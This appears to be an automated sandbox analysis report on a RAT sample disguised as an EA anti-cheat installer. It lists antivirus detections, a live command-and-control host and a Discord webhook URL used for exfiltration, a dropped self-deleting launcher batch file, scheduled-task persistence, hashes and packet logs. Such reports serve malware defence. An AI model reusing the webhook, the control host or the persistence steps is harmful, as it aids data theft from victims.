                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Xyq6rvzLJs.exe63%ReversingLabsByteCode-MSIL.Backdoor.Asyncrat
                  Xyq6rvzLJs.exe100%AviraHEUR/AGEN.1313050
                  Xyq6rvzLJs.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe100%AviraHEUR/AGEN.1313050
                  C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe63%ReversingLabsByteCode-MSIL.Backdoor.Asyncrat
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://g.top4top.io/p_2522c7w8u0%Avira URL Cloudsafe
                  https://g.top4top.io/p_2522c7w8u1.png0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  kanibal.mooo.com
                  141.98.102.187
                  truetrue
                    unknown
                    discord.com
                    162.159.137.232
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://discord.com/api/webhooks/1096011178049802290/d9w9LhtbB8Cy4apceC6cLWfZWhlAAMAf3qABUNFcfpGyxXEk9Qtozf7gqlpK15fLwaspfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://discord.com$77EAAntiCheat.Installler.exe, 0000000C.00000002.3298160192.000000000406E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://discord.com$77EAAntiCheat.Installler.exe, 0000000C.00000002.3298160192.000000000410B000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://discord.com/api/webhooks/1096011178049802290/d9w9LhtbB8Cy4apceC6cLWfZWhlAAMAf3qABUNFcfpGyxXE$77EAAntiCheat.Installler.exe, 00000017.00000002.2137877300.0000000003771000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://g.top4top.io/p_2522c7w8u$77EAAntiCheat.Installler.exe, 00000017.00000002.2137877300.0000000003771000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://g.top4top.io/p_2522c7w8u1.png$77EAAntiCheat.Installler.exe, 00000017.00000002.2137877300.0000000003771000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXyq6rvzLJs.exe, 00000000.00000002.2077667438.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp, $77EAAntiCheat.Installler.exe, 0000000C.00000002.3298160192.0000000003D29000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                162.159.137.232
                                discord.comUnited States
                                13335CLOUDFLARENETUSfalse
                                141.98.102.187
                                kanibal.mooo.comRomania
                                9009M247GBtrue
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1552937
                                Start date and time:2024-11-09 22:52:07 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 3s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:27
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Xyq6rvzLJs.exe
                                renamed because original name is a hash value
                                Original Sample Name:3aab068d8c443560d02e4b58cf05e8f1b6d70f93.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@32/10@3/2
                                EGA Information:
                                • Successful, ratio: 66.7%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 13
                                • Number of non-executed functions: 1
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target $77EAAntiCheat.Installler.exe, PID 6104 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • VT rate limit hit for: Xyq6rvzLJs.exe
                                TimeTypeDescription
                                16:53:04API Interceptor1x Sleep call for process: Xyq6rvzLJs.exe modified
                                16:53:09API Interceptor17x Sleep call for process: powershell.exe modified
                                22:53:10Task SchedulerRun new task: $77EAAntiCheat.Installler.exe path: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe s>"\$77EAAntiCheat.Installler.exe" /AsAdmin
                                22:53:10Task SchedulerRun new task: EAAntiCheat.Installler_Task-DAILY-21PM path: %MyFile%
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                162.159.137.232CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                  file.exeGet hashmaliciousUnknownBrowse
                                    SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                      570ZenR882.exeGet hashmaliciousUnknownBrowse
                                        Ff0ZjqSI9Y.exeGet hashmaliciousUnknownBrowse
                                          SecuriteInfo.com.Win32.MalwareX-gen.3620.22364.exeGet hashmaliciousUnknownBrowse
                                            EUOgPjsBTC.exeGet hashmaliciousUnknownBrowse
                                              webhook.ps1Get hashmaliciousUnknownBrowse
                                                sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                  cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                    141.98.102.187cheque-000000005903.exeGet hashmaliciousRemcosBrowse
                                                      C76CECD2DA3F218E46C4D2EC8DF95176634C13E35F885.exeGet hashmaliciousNanocoreBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        discord.com00514DIRyT.exeGet hashmaliciousGO StealerBrowse
                                                        • 162.159.136.232
                                                        yuki.exeGet hashmaliciousLuna StealerBrowse
                                                        • 162.159.138.232
                                                        CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                        • 162.159.135.232
                                                        CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                        • 162.159.137.232
                                                        file.exeGet hashmaliciousGrowtopiaBrowse
                                                        • 162.159.138.232
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 162.159.137.232
                                                        gMd6of50Do.exeGet hashmaliciousBlank GrabberBrowse
                                                        • 162.159.136.232
                                                        El9HaBFrFM.exeGet hashmaliciousBlank GrabberBrowse
                                                        • 162.159.128.233
                                                        aLRjksjY78.exeGet hashmaliciousHackBrowserBrowse
                                                        • 162.159.136.232
                                                        jF5cZUXeQm.exeGet hashmaliciousBlank GrabberBrowse
                                                        • 162.159.135.232
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUSypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                        • 104.26.13.205
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                                        • 104.21.56.70
                                                        New Fax Notification.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 188.114.96.3
                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                        • 172.64.41.3
                                                        x8AH98H0eQ.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.56.70
                                                        file.exeGet hashmaliciousLummaC Stealer, StealcBrowse
                                                        • 188.114.97.3
                                                        https://qrco.de/bfYBpcGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 104.18.95.41
                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                        • 188.114.97.3
                                                        zGHItMC5Zc.exeGet hashmaliciousStealcBrowse
                                                        • 104.21.56.70
                                                        M247GBnsharm7.elfGet hashmaliciousUnknownBrowse
                                                        • 213.182.204.57
                                                        nshmips.elfGet hashmaliciousUnknownBrowse
                                                        • 213.182.204.57
                                                        YZFO4VTuFN.exeGet hashmaliciousUnknownBrowse
                                                        • 195.206.105.42
                                                        RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 172.94.53.170
                                                        hich1UWLIk.elfGet hashmaliciousMiraiBrowse
                                                        • 168.80.203.97
                                                        Bot.exeGet hashmaliciousUnknownBrowse
                                                        • 93.177.73.226
                                                        Bot.exeGet hashmaliciousUnknownBrowse
                                                        • 93.177.73.226
                                                        Bot.exeGet hashmaliciousUnknownBrowse
                                                        • 93.177.73.226
                                                        Bot.exeGet hashmaliciousUnknownBrowse
                                                        • 93.177.73.226
                                                        harm5.elfGet hashmaliciousUnknownBrowse
                                                        • 213.182.204.57
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                        • 162.159.137.232
                                                        seethebestthingswithentirelifetaggreatwithmebestofthem.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                        • 162.159.137.232
                                                        creatbesthingswithbettersytelgivenmebestthingstobe.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                        • 162.159.137.232
                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 162.159.137.232
                                                        DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                        • 162.159.137.232
                                                        Purchase_order08112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                        • 162.159.137.232
                                                        WMdKM7E5Yg.exeGet hashmaliciousQuasarBrowse
                                                        • 162.159.137.232
                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                        • 162.159.137.232
                                                        IsVcdKSMbE.exeGet hashmaliciousUnknownBrowse
                                                        • 162.159.137.232
                                                        IsVcdKSMbE.exeGet hashmaliciousUnknownBrowse
                                                        • 162.159.137.232
                                                        No context
                                                        Process:C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):859
                                                        Entropy (8bit):5.379735105545312
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Khk:MxHKQ71qHGIs0HKCYHKGSI6ok
                                                        MD5:66903BF8F31D4DE1B691C99CF8812A8A
                                                        SHA1:6A49612CB1C2356F176B1B2E5481FB3CD0CB4289
                                                        SHA-256:C09B65A3BA4819DAA12705C8C48400AD8F80B3B779954C14B9679396D252AF42
                                                        SHA-512:A96F5D88E7B7A1C36D77AA9A42CA3513B70261F9B494F387A46F1DA01934E05F9659A0E8512D677DFC8602254C230CC7F370A83B916C329F908B645C5A2C247D
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                                        Process:C:\Users\user\Desktop\Xyq6rvzLJs.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):1305
                                                        Entropy (8bit):5.376949986661823
                                                        Encrypted:false
                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhBsXE4Npp+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6okHNpp+vU
                                                        MD5:12F2EE5E3A0DB26E8E1314AA79342433
                                                        SHA1:24FDDE745B1AC21277129001357B38CC05079277
                                                        SHA-256:3E515165812050CFEA5D52EB95B0794A79E577AAF171B4C7FD7A32585E16C338
                                                        SHA-512:0C887455EB381DE55764A52DA4A9F1C8884FA76AE56F49B95D20D142300D6BB7F8874099847BBEF345A4D8931E4C475AE3CE86912A346CDED68B6DEE635C5CEF
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syst
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1510207563435464
                                                        Encrypted:false
                                                        SSDEEP:3:NlllulTkklh:NllUokl
                                                        MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                        SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                        SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                        SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                        Malicious:false
                                                        Preview:@...e................................................@..........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\Desktop\Xyq6rvzLJs.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):174
                                                        Entropy (8bit):5.109021136735237
                                                        Encrypted:false
                                                        SSDEEP:3:mKDDCMNqTtvL5oUkh4EaKC5ZceLDptCSmqRDUkh4E2J5xAInTRIJcVZPy:hWKqTtT69aZ5Gqpmq1923fTRVk
                                                        MD5:F24FE4B9AAC744BEC4630810ACFC9BE8
                                                        SHA1:866EA97817CB2584E762F9C7E1E1A56E80302B93
                                                        SHA-256:83CE93E9FB70C8F519EC1DC555A5529F1CD2D95C0D7B5A99139D5A8C7637E1D7
                                                        SHA-512:BBC1B3E6502DD152648827D9619F06B456B9F69E158F1C0C29BA7DC50608D5EF6E5285C2DF1FC6F0070E7A48AFC8C3F7C345556A036FC201ABE7EADC10329348
                                                        Malicious:false
                                                        Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpF224.tmp.bat" /f /q..
                                                        Process:C:\Users\user\Desktop\Xyq6rvzLJs.exe
                                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.567764905703187
                                                        Encrypted:false
                                                        SSDEEP:768:+bzAM+pp779X5zgiYVLWQ6l6+RULQW59Phnmz1QB6Sxy8vrI/bV:+bzAM+nrzmLl6lFGsa941Qo+y8s/bV
                                                        MD5:5EC3267ACFD4EF36CBFB796016142892
                                                        SHA1:3AAB068D8C443560D02E4B58CF05E8F1B6D70F93
                                                        SHA-256:64B1F050CBE98F8ECDC56CF7FB3A2A96FDEB3D5BAD2053DB36BA12A5FE5E92BB
                                                        SHA-512:96B707DC5BFF8E986FF65E3A1F0F07AC61A8DA7227F4754BE5A89900613615D484A1BE006A7162DD8E7AE0CC409ECEF77AE0CFE1867B7920FE2854B068827B3B
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....:/g.........."...................... .....@..... ....................................@...@......@............... ............................................................................................................................... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..BH.......<\...p...................................................................(t...*..0..........(....-..(....(....-..(....(....+. ....(......&..(....,.(&...(....(....s......r...po.....r...pr...p(....o....o......o......o.....(....&..&..(Y...(......&..~....-........s.........~....s....(......&..(E...-.(P...(M.....&..~....(....(....+.....@....!..-........F.B.......................).....................(....*.0..........(....~....(....o.........~....(....s.........(....~....(....(...
                                                        Process:C:\Windows\System32\timeout.exe
                                                        File Type:ASCII text, with CRLF line terminators, with overstriking
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.41440934524794
                                                        Encrypted:false
                                                        SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                        MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                        SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                        SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                        SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                        Malicious:false
                                                        Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.567764905703187
                                                        TrID:
                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                        • DOS Executable Generic (2002/1) 0.92%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:Xyq6rvzLJs.exe
                                                        File size:46'592 bytes
                                                        MD5:5ec3267acfd4ef36cbfb796016142892
                                                        SHA1:3aab068d8c443560d02e4b58cf05e8f1b6d70f93
                                                        SHA256:64b1f050cbe98f8ecdc56cf7fb3a2a96fdeb3d5bad2053db36ba12a5fe5e92bb
                                                        SHA512:96b707dc5bff8e986ff65e3a1f0f07ac61a8da7227f4754be5a89900613615d484a1be006a7162dd8e7ae0cc409ecef77ae0cfe1867b7920fe2854b068827b3b
                                                        SSDEEP:768:+bzAM+pp779X5zgiYVLWQ6l6+RULQW59Phnmz1QB6Sxy8vrI/bV:+bzAM+nrzmLl6lFGsa941Qo+y8s/bV
                                                        TLSH:10236B007BCD8679E6BD5B3869F1422A4AB5F1A35512E78E1CC840EB1D13BC98B817F6
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....:/g.........."...................... .....@..... ....................................@...@......@............... .....
                                                        Icon Hash:00928e8e8686b000
                                                        Entrypoint:0x140000000
                                                        Entrypoint Section:
                                                        Digitally signed:false
                                                        Imagebase:0x140000000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x672F3ABB [Sat Nov 9 10:34:35 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:
                                                        Instruction
                                                        dec ebp
                                                        pop edx
                                                        nop
                                                        add byte ptr [ebx], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax+eax], al
                                                        add byte ptr [eax], al
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x510.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xad0c0xae00ffde49d9a921514a8c8d614f289321f7False0.5044225933908046data5.631171167191817IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xe0000x5100x600499d86a9e6e915abb54fb551448593d5False0.3841145833333333data3.8014943442567803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0xe0a00x27cdata0.449685534591195
                                                        RT_MANIFEST0xe3200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-09T22:53:22.851817+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549710TCP
                                                        2024-11-09T22:54:01.184035+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.549942TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 9, 2024 22:53:09.875349045 CET49706443192.168.2.5162.159.137.232
                                                        Nov 9, 2024 22:53:09.875411034 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:09.875483036 CET49706443192.168.2.5162.159.137.232
                                                        Nov 9, 2024 22:53:09.886169910 CET49706443192.168.2.5162.159.137.232
                                                        Nov 9, 2024 22:53:09.886192083 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:10.498640060 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:10.498729944 CET49706443192.168.2.5162.159.137.232
                                                        Nov 9, 2024 22:53:10.502698898 CET49706443192.168.2.5162.159.137.232
                                                        Nov 9, 2024 22:53:10.502712011 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:10.502990961 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:10.541981936 CET49706443192.168.2.5162.159.137.232
                                                        Nov 9, 2024 22:53:10.583336115 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:10.667659044 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:10.668133020 CET49706443192.168.2.5162.159.137.232
                                                        Nov 9, 2024 22:53:10.668154955 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:10.843858004 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:10.843924046 CET44349706162.159.137.232192.168.2.5
                                                        Nov 9, 2024 22:53:10.844125986 CET49706443192.168.2.5162.159.137.232
                                                        Nov 9, 2024 22:53:10.851605892 CET49706443192.168.2.5162.159.137.232
                                                        Nov 9, 2024 22:53:11.311963081 CET4970729853192.168.2.5141.98.102.187
                                                        Nov 9, 2024 22:53:11.316870928 CET2985349707141.98.102.187192.168.2.5
                                                        Nov 9, 2024 22:53:11.317048073 CET4970729853192.168.2.5141.98.102.187
